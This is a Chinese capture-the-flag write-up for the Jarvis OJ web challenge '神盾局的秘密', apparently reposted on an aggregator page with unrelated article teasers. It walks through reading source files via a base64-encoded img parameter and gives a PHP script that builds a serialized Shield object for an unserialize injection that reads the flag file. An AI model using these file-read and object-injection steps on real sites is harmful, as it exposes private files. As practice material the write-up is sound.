神盾局的秘密

2023-10-20 10:50
文章标签 秘密 神盾

本文主要是介绍神盾局的秘密,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

题目地址 :http://web.jarvisoj.com:32768/

 

 

 

一般套路,先看HTTP头,源码

 

通过扫网站发现存在index.pnp

访问也没有什么东西

尝试:http://web.jarvisoj.com:32768/showimg.php?img=index.php

 

 将index.php进行base64试试:

view-source:http://web.jarvisoj.com:32768/showimg.php?img=aW5kZXgucGhw

返回内容:

 

读一下shield.php

 

尝试读pctf.php

 

接着读view-source:http://web.jarvisoj.com:32768/showimg.php?img=c2hvd2ltZy5waHA=

 

 

接下来分析源码

根据源码写出序列化

<?php //require_once('shield.php');$x = new Shield();isset($_GET['class']) && $g = $_GET['class'];echo $g;//echo $x;if (!empty($g)) {$x = unserialize($g);print_r($x);}echo $x->readfile();class Shield {public $file;function __construct($filename = '') {$this -> file = $filename;echo $this->file;}function readfile() {if (!empty($this->file) && stripos($this->file,'..')===FALSE  && stripos($this->file,'/')===FALSE && stripos($this->file,'\\')==FALSE) {return @file_get_contents($this->file);}}}
$a = new Shield('pctf.php');echo serialize($a);?>

 

这篇关于神盾局的秘密的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!


http://www.chinasem.cn/article/246599

相关文章

Python中的私有属性与方法:解锁面向对象编程的秘密

Python中的私有属性与方法:解锁面向对象编程的秘密

在Python的广阔世界里,面向对象编程(OOP)是一种强大而灵活的方法论,它帮助我们更好地组织代码、管理状态,并构建可复用的软件组件。而在这个框架内,私有属性与方法则是实现封装的关键机制之一。它们不仅有助于隐藏类内部的具体实现细节,还能保护数据免受外部干扰。今天,让我们一起探索Python中私有属性与方法的魅力所在,了解它们如何在实际开发中发挥重要作用。 引言 随着软件系统变得越来越复杂,维
阅读更多...
Python中的函数艺术:解锁高效编程的秘密

Python中的函数艺术:解锁高效编程的秘密

引言 在软件开发过程中,重复使用相同的代码段是不可避免的。这不仅增加了代码量,还可能导致维护困难。通过定义函数,我们可以将这些重复代码抽象出来,封装成一个可重用的组件。这样做的好处显而易见:减少了代码冗余、提高了代码的复用性,同时也使得程序结构更加清晰。 此外,在团队协作时,良好的函数设计有助于提高沟通效率。当每个函数都有明确的功能边界时,成员之间可以更轻松地理解和维护彼此的代码。 基础语法
阅读更多...
Python中的集合魔法:解锁高效数据处理的秘密

Python中的集合魔法:解锁高效数据处理的秘密

引言 集合是一种不允许重复元素的数据结构,并且其内部元素无序排列。这种特性使得集合在某些场景下表现得极为出色: 去重:快速去除列表或数组中的重复项。交集、并集、差集等运算:用于比较两个或多个集合间的关系,非常适用于权限控制、用户管理等领域。性能优势:相较于列表,集合在查找元素时速度更快,平均时间复杂度为O(1)。 基础语法介绍 创建集合 在Python中创建一个空集合需要使用set()函
阅读更多...
BugKu练习记录:小山丘的秘密

BugKu练习记录:小山丘的秘密

题目: hill能有什么秘密呢 bugku{PLGTGBQHM}其中A=1,flag全为小写 hill解密,a=1,所以z=0,字母表为zabcdefghijklmnopqrstuvwxy,根据图片上的棋子数得到对应的字母,分别是abczadefz,用工具解出明文为whatahill,答案为bugku{whatahill}
阅读更多...
探索Python数据持久化的秘密:ZODB库的神奇之旅

探索Python数据持久化的秘密:ZODB库的神奇之旅

文章目录 探索Python数据持久化的秘密:ZODB库的神奇之旅背景ZODB是什么?如何安装ZODB?简单库函数使用方法场景应用常见Bug及解决方案总结 探索Python数据持久化的秘密:ZODB库的神奇之旅 背景 在Python的广阔世界中,数据持久化是一个不可或缺的需求。无论是为了保存应用程序的状态,还是为了在多个会话之间共享数据,我们都需要一种可靠的方法来存储和
阅读更多...
应用层协议(下)Https加密Http的秘密(含逻辑图解 简单易学 通俗易懂!)

应用层协议(下)Https加密Http的秘密(含逻辑图解 简单易学 通俗易懂!)

绪论​ “如今我努力奔跑,不过是为了追上那个曾经被寄予厚望的自己 —— 约翰丶利文斯顿”,本章承接上章Http,没看过强烈建议看后再看本章,本章主要就是学习Https是干什么的并且去底层的学习Http的原理,将会讲到Https的加密、解密过程。 话不多说安全带系好,发车啦(建议电脑观看)。 Https协议 https也是一个应用层协议,是在http协议的基础上引入了一个加密层
阅读更多...
天猫商品详情API:解锁商品收藏与加购信息的秘密

天猫商品详情API:解锁商品收藏与加购信息的秘密

在电商领域的激烈竞争中,准确获取用户的购物行为和偏好成为了商家和开发者提升业务效果的关键。天猫作为中国最大的B2C电商平台之一,其商品详情API接口为商家和开发者提供了强大的数据支持。然而,对于商品收藏与加购信息的获取,由于涉及到用户隐私和商家策略,直接通过API获取这些信息并非易事。本文将探讨如何在遵守天猫平台规则的前提下,间接获取这些关键数据。 一、天猫商品详情API概述 天猫商品详情AP
阅读更多...
微调:让模型在特定任务上更“聪明”的秘密

微调:让模型在特定任务上更“聪明”的秘密

之前看到一篇meta的文章,提到:“微调通常对注入新知识没什么帮助”,所以和chatgpt进行了一番讨论,这是总结文章: 微调:让模型在特定任务上更“聪明”的秘密 引言 随着人工智能的发展,预训练模型(如GPT-3、BERT等)已经成为了自然语言处理任务的中坚力量。然而,尽管这些模型在广泛的任务上表现出色,在特定任务或领域中,往往需要进行进一步优化。这就引出了“微调”(Fine-Tuning
阅读更多...
H264编码原理(一)压缩背后的秘密

H264编码原理(一)压缩背后的秘密

一、引言 在当今的数字视频世界中,H.264编码技术无疑占据着至关重要的位置。虽然H.264编码原理可能听起来复杂又深奥,但只要深入了解视频的特性,就能明白为什么它需要如此设计。通过利用视频内容的冗余性和人眼的感知特性,H.264能够显著提高视频的压缩效率,同时保持较高的视觉质量。本文将带您一探究竟,揭示H.264编码技术的核心原理,并对其与其他前沿编码格式的对比进行详细阐述。 二、为什么视频
阅读更多...
开放式耳机好处有哪些?一文告诉你开放式耳机的秘密

开放式耳机好处有哪些?一文告诉你开放式耳机的秘密

先放答案: 开放式耳机的好处主要有以下方面: 佩戴舒适:开放式耳机通常不堵塞耳道,不会对耳朵造成压迫,长时间佩戴也不易产生闷热感,相比入耳式耳机舒适度更高,能减少耳部疲劳和不适。例如,一些开放式耳机采用了特殊的材质和设计,如柔软的硅胶耳挂或轻盈的机身结构,让用户在长时间使用过程中几乎感觉不到负担。 更健康卫生:不入耳的设计使得耳道能够保持干爽透气,减少了细菌滋生的环境,降低了耳部感染
阅读更多...

Copyright China编程 23002807@qq.com

沪ICP备2023033072号-2